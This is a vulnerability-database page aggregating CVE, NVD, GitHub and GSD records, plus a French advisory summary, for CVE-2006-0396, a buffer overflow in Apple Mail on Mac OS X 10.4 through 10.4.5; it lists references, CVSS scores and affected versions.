CVE-2006-0396 (GCVE-0-2006-0396)

Vulnerability from cvelistv5

Published

2006-03-14 11:00

Modified

2024-08-07 16:34

Severity ?

CWE

Summary

References

URL

Tags

cve@mitre.org	http://docs.info.apple.com/article.html?artnum=303453
cve@mitre.org	http://lists.apple.com/archives/security-announce/2006/Mar/msg00001.html
cve@mitre.org	http://secunia.com/advisories/19129	Patch, Vendor Advisory
cve@mitre.org	http://securitytracker.com/id?1015762	Patch
cve@mitre.org	http://www.digitalmunition.com/DMA%5B2006-0313a%5D.txt	Exploit, Vendor Advisory
cve@mitre.org	http://www.kb.cert.org/vuls/id/980084	US Government Resource
cve@mitre.org	http://www.osvdb.org/23872
cve@mitre.org	http://www.securityfocus.com/archive/1/427601/100/0/threaded
cve@mitre.org	http://www.securityfocus.com/bid/17081	Exploit, Patch
cve@mitre.org	http://www.vupen.com/english/advisories/2006/0949
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/25209
af854a3a-2127-422b-91ae-364da2661108	http://docs.info.apple.com/article.html?artnum=303453
af854a3a-2127-422b-91ae-364da2661108	http://lists.apple.com/archives/security-announce/2006/Mar/msg00001.html
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/19129	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://securitytracker.com/id?1015762	Patch
af854a3a-2127-422b-91ae-364da2661108	http://www.digitalmunition.com/DMA%5B2006-0313a%5D.txt	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.kb.cert.org/vuls/id/980084	US Government Resource
af854a3a-2127-422b-91ae-364da2661108	http://www.osvdb.org/23872
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/427601/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/17081	Exploit, Patch
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2006/0949
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/25209

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T16:34:14.558Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "17081",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/17081"
          },
          {
            "name": "23872",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://www.osvdb.org/23872"
          },
          {
            "name": "ADV-2006-0949",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/0949"
          },
          {
            "name": "1015762",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1015762"
          },
          {
            "name": "VU#980084",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT-VN",
              "x_transferred"
            ],
            "url": "http://www.kb.cert.org/vuls/id/980084"
          },
          {
            "name": "macosx-mail-attachment-bo(25209)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/25209"
          },
          {
            "name": "19129",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/19129"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.digitalmunition.com/DMA%5B2006-0313a%5D.txt"
          },
          {
            "name": "APPLE-SA-2006-03-13",
            "tags": [
              "vendor-advisory",
              "x_refsource_APPLE",
              "x_transferred"
            ],
            "url": "http://lists.apple.com/archives/security-announce/2006/Mar/msg00001.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://docs.info.apple.com/article.html?artnum=303453"
          },
          {
            "name": "20060314 DMA[2006-0313a] - \u0027Apple OSX Mail.app RFC1740 Real Name Buffer Overflow\u0027",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/427601/100/0/threaded"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2006-03-13T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflow in Mail in Apple Mac OS X 10.4 up to 10.4.5, when patched with Security Update 2006-001, allows remote attackers to execute arbitrary code via a long Real Name value in an e-mail attachment sent in AppleDouble format, which triggers the overflow when the user double-clicks on an attachment."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-19T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "17081",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/17081"
        },
        {
          "name": "23872",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://www.osvdb.org/23872"
        },
        {
          "name": "ADV-2006-0949",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/0949"
        },
        {
          "name": "1015762",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1015762"
        },
        {
          "name": "VU#980084",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT-VN"
          ],
          "url": "http://www.kb.cert.org/vuls/id/980084"
        },
        {
          "name": "macosx-mail-attachment-bo(25209)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/25209"
        },
        {
          "name": "19129",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/19129"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.digitalmunition.com/DMA%5B2006-0313a%5D.txt"
        },
        {
          "name": "APPLE-SA-2006-03-13",
          "tags": [
            "vendor-advisory",
            "x_refsource_APPLE"
          ],
          "url": "http://lists.apple.com/archives/security-announce/2006/Mar/msg00001.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://docs.info.apple.com/article.html?artnum=303453"
        },
        {
          "name": "20060314 DMA[2006-0313a] - \u0027Apple OSX Mail.app RFC1740 Real Name Buffer Overflow\u0027",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/427601/100/0/threaded"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2006-0396",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Buffer overflow in Mail in Apple Mac OS X 10.4 up to 10.4.5, when patched with Security Update 2006-001, allows remote attackers to execute arbitrary code via a long Real Name value in an e-mail attachment sent in AppleDouble format, which triggers the overflow when the user double-clicks on an attachment."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "17081",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/17081"
            },
            {
              "name": "23872",
              "refsource": "OSVDB",
              "url": "http://www.osvdb.org/23872"
            },
            {
              "name": "ADV-2006-0949",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/0949"
            },
            {
              "name": "1015762",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1015762"
            },
            {
              "name": "VU#980084",
              "refsource": "CERT-VN",
              "url": "http://www.kb.cert.org/vuls/id/980084"
            },
            {
              "name": "macosx-mail-attachment-bo(25209)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/25209"
            },
            {
              "name": "19129",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/19129"
            },
            {
              "name": "http://www.digitalmunition.com/DMA%5B2006-0313a%5D.txt",
              "refsource": "MISC",
              "url": "http://www.digitalmunition.com/DMA%5B2006-0313a%5D.txt"
            },
            {
              "name": "APPLE-SA-2006-03-13",
              "refsource": "APPLE",
              "url": "http://lists.apple.com/archives/security-announce/2006/Mar/msg00001.html"
            },
            {
              "name": "http://docs.info.apple.com/article.html?artnum=303453",
              "refsource": "CONFIRM",
              "url": "http://docs.info.apple.com/article.html?artnum=303453"
            },
            {
              "name": "20060314 DMA[2006-0313a] - \u0027Apple OSX Mail.app RFC1740 Real Name Buffer Overflow\u0027",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/427601/100/0/threaded"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2006-0396",
    "datePublished": "2006-03-14T11:00:00",
    "dateReserved": "2006-01-24T00:00:00",
    "dateUpdated": "2024-08-07T16:34:14.558Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2006-0396\",\"sourceIdentifier\":\"cve@mitre.org\",\"published\":\"2006-03-14T11:02:00.000\",\"lastModified\":\"2025-04-03T01:03:51.193\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Buffer overflow in Mail in Apple Mac OS X 10.4 up to 10.4.5, when patched with Security Update 2006-001, allows remote attackers to execute arbitrary code via a long Real Name value in an e-mail attachment sent in AppleDouble format, which triggers the overflow when the user double-clicks on an attachment.\"}],\"metrics\":{\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:H/Au:N/C:P/I:P/A:P\",\"baseScore\":5.1,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"HIGH\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":4.9,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":true,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":true}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"NVD-CWE-Other\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:apple:mac_os_x:10.4:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"0760FDDB-38D3-4263-9B4D-1AF5E613A4F9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:apple:mac_os_x:10.4.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"AFD4DE58-46C7-4E69-BF36-C5FD768B8248\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:apple:mac_os_x:10.4.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"CF824694-52DE-44E3-ACAD-60B2A84CD3CE\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:apple:mac_os_x:10.4.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B73A0891-A37A-4E0D-AA73-B18BFD6B1447\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:apple:mac_os_x:10.4.4:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"26AC38AB-D689-4B2B-9DAE-F03F4DFD15BE\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:apple:mac_os_x:10.4.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"0C580935-0091-4163-B747-750FB7686973\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:apple:mac_os_x_server:10.4:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D24D5FA5-95DD-4ECC-B99A-8CB33156A6D0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:apple:mac_os_x_server:10.4.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"29644501-54BD-45E9-A6C1-618892CD354F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:apple:mac_os_x_server:10.4.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"8A132487-E89F-4D0D-8366-14AFC904811F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:apple:mac_os_x_server:10.4.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"FD231103-D7C7-4697-BE90-D67558D6115C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:apple:mac_os_x_server:10.4.4:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"BCADAAA0-C885-466C-A122-A94E73EAF817\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:apple:mac_os_x_server:10.4.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"448DB1C7-7B0C-4076-9B9F-1CDCD5EB6930\"}]}]}],\"references\":[{\"url\":\"http://docs.info.apple.com/article.html?artnum=303453\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://lists.apple.com/archives/security-announce/2006/Mar/msg00001.html\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://secunia.com/advisories/19129\",\"source\":\"cve@mitre.org\",\"tags\":[\"Patch\",\"Vendor Advisory\"]},{\"url\":\"http://securitytracker.com/id?1015762\",\"source\":\"cve@mitre.org\",\"tags\":[\"Patch\"]},{\"url\":\"http://www.digitalmunition.com/DMA%5B2006-0313a%5D.txt\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"http://www.kb.cert.org/vuls/id/980084\",\"source\":\"cve@mitre.org\",\"tags\":[\"US Government Resource\"]},{\"url\":\"http://www.osvdb.org/23872\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://www.securityfocus.com/archive/1/427601/100/0/threaded\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://www.securityfocus.com/bid/17081\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Patch\"]},{\"url\":\"http://www.vupen.com/english/advisories/2006/0949\",\"source\":\"cve@mitre.org\"},{\"url\":\"https://exchange.xforce.ibmcloud.com/vulnerabilities/25209\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://docs.info.apple.com/article.html?artnum=303453\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://lists.apple.com/archives/security-announce/2006/Mar/msg00001.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://secunia.com/advisories/19129\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Vendor Advisory\"]},{\"url\":\"http://securitytracker.com/id?1015762\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"http://www.digitalmunition.com/DMA%5B2006-0313a%5D.txt\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"http://www.kb.cert.org/vuls/id/980084\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"US Government Resource\"]},{\"url\":\"http://www.osvdb.org/23872\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.securityfocus.com/archive/1/427601/100/0/threaded\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.securityfocus.com/bid/17081\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Patch\"]},{\"url\":\"http://www.vupen.com/english/advisories/2006/0949\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://exchange.xforce.ibmcloud.com/vulnerabilities/25209\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}"
  }
}

Description

De multiples vulnérabilités existent dans la version actuelle de Mac 0S X v.10.4.5. Parmi les services impactés, nous notons :

Mail : Une personne malveillante peut envoyer un courriel particulier avec pièces jointes, afin d'inciter l'utilisateur à ouvrir celles-ci. Cette action peut entraîner un dépassement de tampon permettant l'exécution de code arbitraire sur le système. Le problème n'existe pas pour les versions Mac OS antérieures à 10.4.
Safari, LaunchServices : Safari ouvre automatiquement des fichiers courants, comme les images ou les vidéos. Une personne malveillante peut alors insérer sur son site un code ayant une telle apparence, afin d'exécuter un code arbitraire à distance. Le problème n'existe pas pour les versions de Mac OS antérieures à 10.4.
CoreTypes : Une page contenant un code JavaScript malveillant permet d'accéder et modifier des documents d'origine différente (voir la notion sous Mac OS de Same-Origin, une origine étant un triplet constitué par le protocole, le port et le serveur Internet).

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

None

Impacted products

	Vendor	Product	Description
	Apple	macOS	Mac OS X version 10.4.5
	Apple	macOS	Mac OS X Server version 10.4.5

References

Title

Publication Time

ghsa-rrmc-qhwh-87xf

Vulnerability from github

Published

2022-05-01 06:39

Modified

2022-05-01 06:39

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2006-0396"
  ],
  "database_specific": {
    "cwe_ids": [],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2006-03-14T11:02:00Z",
    "severity": "MODERATE"
  },
  "details": "Buffer overflow in Mail in Apple Mac OS X 10.4 up to 10.4.5, when patched with Security Update 2006-001, allows remote attackers to execute arbitrary code via a long Real Name value in an e-mail attachment sent in AppleDouble format, which triggers the overflow when the user double-clicks on an attachment.",
  "id": "GHSA-rrmc-qhwh-87xf",
  "modified": "2022-05-01T06:39:32Z",
  "published": "2022-05-01T06:39:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2006-0396"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/25209"
    },
    {
      "type": "WEB",
      "url": "http://docs.info.apple.com/article.html?artnum=303453"
    },
    {
      "type": "WEB",
      "url": "http://lists.apple.com/archives/security-announce/2006/Mar/msg00001.html"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/19129"
    },
    {
      "type": "WEB",
      "url": "http://securitytracker.com/id?1015762"
    },
    {
      "type": "WEB",
      "url": "http://www.digitalmunition.com/DMA%5B2006-0313a%5D.txt"
    },
    {
      "type": "WEB",
      "url": "http://www.kb.cert.org/vuls/id/980084"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/23872"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/427601/100/0/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/17081"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2006/0949"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

gsd-2006-0396

Vulnerability from gsd

Modified

2023-12-13 01:19

Details

Aliases

CVE-2006-0396

Aliases

CVE-2006-0396

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2006-0396",
    "description": "Buffer overflow in Mail in Apple Mac OS X 10.4 up to 10.4.5, when patched with Security Update 2006-001, allows remote attackers to execute arbitrary code via a long Real Name value in an e-mail attachment sent in AppleDouble format, which triggers the overflow when the user double-clicks on an attachment.",
    "id": "GSD-2006-0396"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2006-0396"
      ],
      "details": "Buffer overflow in Mail in Apple Mac OS X 10.4 up to 10.4.5, when patched with Security Update 2006-001, allows remote attackers to execute arbitrary code via a long Real Name value in an e-mail attachment sent in AppleDouble format, which triggers the overflow when the user double-clicks on an attachment.",
      "id": "GSD-2006-0396",
      "modified": "2023-12-13T01:19:51.080823Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2006-0396",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Buffer overflow in Mail in Apple Mac OS X 10.4 up to 10.4.5, when patched with Security Update 2006-001, allows remote attackers to execute arbitrary code via a long Real Name value in an e-mail attachment sent in AppleDouble format, which triggers the overflow when the user double-clicks on an attachment."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "17081",
            "refsource": "BID",
            "url": "http://www.securityfocus.com/bid/17081"
          },
          {
            "name": "23872",
            "refsource": "OSVDB",
            "url": "http://www.osvdb.org/23872"
          },
          {
            "name": "ADV-2006-0949",
            "refsource": "VUPEN",
            "url": "http://www.vupen.com/english/advisories/2006/0949"
          },
          {
            "name": "1015762",
            "refsource": "SECTRACK",
            "url": "http://securitytracker.com/id?1015762"
          },
          {
            "name": "VU#980084",
            "refsource": "CERT-VN",
            "url": "http://www.kb.cert.org/vuls/id/980084"
          },
          {
            "name": "macosx-mail-attachment-bo(25209)",
            "refsource": "XF",
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/25209"
          },
          {
            "name": "19129",
            "refsource": "SECUNIA",
            "url": "http://secunia.com/advisories/19129"
          },
          {
            "name": "http://www.digitalmunition.com/DMA%5B2006-0313a%5D.txt",
            "refsource": "MISC",
            "url": "http://www.digitalmunition.com/DMA%5B2006-0313a%5D.txt"
          },
          {
            "name": "APPLE-SA-2006-03-13",
            "refsource": "APPLE",
            "url": "http://lists.apple.com/archives/security-announce/2006/Mar/msg00001.html"
          },
          {
            "name": "http://docs.info.apple.com/article.html?artnum=303453",
            "refsource": "CONFIRM",
            "url": "http://docs.info.apple.com/article.html?artnum=303453"
          },
          {
            "name": "20060314 DMA[2006-0313a] - \u0027Apple OSX Mail.app RFC1740 Real Name Buffer Overflow\u0027",
            "refsource": "BUGTRAQ",
            "url": "http://www.securityfocus.com/archive/1/427601/100/0/threaded"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.4.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.4.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.4.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x_server:10.4.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x_server:10.4.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x_server:10.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x_server:10.4.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.4.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x_server:10.4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x_server:10.4.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2006-0396"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Buffer overflow in Mail in Apple Mac OS X 10.4 up to 10.4.5, when patched with Security Update 2006-001, allows remote attackers to execute arbitrary code via a long Real Name value in an e-mail attachment sent in AppleDouble format, which triggers the overflow when the user double-clicks on an attachment."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "NVD-CWE-Other"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "APPLE-SA-2006-03-13",
              "refsource": "APPLE",
              "tags": [],
              "url": "http://lists.apple.com/archives/security-announce/2006/Mar/msg00001.html"
            },
            {
              "name": "http://docs.info.apple.com/article.html?artnum=303453",
              "refsource": "CONFIRM",
              "tags": [],
              "url": "http://docs.info.apple.com/article.html?artnum=303453"
            },
            {
              "name": "17081",
              "refsource": "BID",
              "tags": [
                "Exploit",
                "Patch"
              ],
              "url": "http://www.securityfocus.com/bid/17081"
            },
            {
              "name": "19129",
              "refsource": "SECUNIA",
              "tags": [
                "Patch",
                "Vendor Advisory"
              ],
              "url": "http://secunia.com/advisories/19129"
            },
            {
              "name": "http://www.digitalmunition.com/DMA%5B2006-0313a%5D.txt",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Vendor Advisory"
              ],
              "url": "http://www.digitalmunition.com/DMA%5B2006-0313a%5D.txt"
            },
            {
              "name": "1015762",
              "refsource": "SECTRACK",
              "tags": [
                "Patch"
              ],
              "url": "http://securitytracker.com/id?1015762"
            },
            {
              "name": "VU#980084",
              "refsource": "CERT-VN",
              "tags": [
                "US Government Resource"
              ],
              "url": "http://www.kb.cert.org/vuls/id/980084"
            },
            {
              "name": "23872",
              "refsource": "OSVDB",
              "tags": [],
              "url": "http://www.osvdb.org/23872"
            },
            {
              "name": "ADV-2006-0949",
              "refsource": "VUPEN",
              "tags": [],
              "url": "http://www.vupen.com/english/advisories/2006/0949"
            },
            {
              "name": "macosx-mail-attachment-bo(25209)",
              "refsource": "XF",
              "tags": [],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/25209"
            },
            {
              "name": "20060314 DMA[2006-0313a] - \u0027Apple OSX Mail.app RFC1740 Real Name Buffer Overflow\u0027",
              "refsource": "BUGTRAQ",
              "tags": [],
              "url": "http://www.securityfocus.com/archive/1/427601/100/0/threaded"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.1,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 4.9,
          "impactScore": 6.4,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": true,
          "severity": "MEDIUM",
          "userInteractionRequired": true
        }
      },
      "lastModifiedDate": "2018-10-19T15:44Z",
      "publishedDate": "2006-03-14T11:02Z"
    }
  }
}

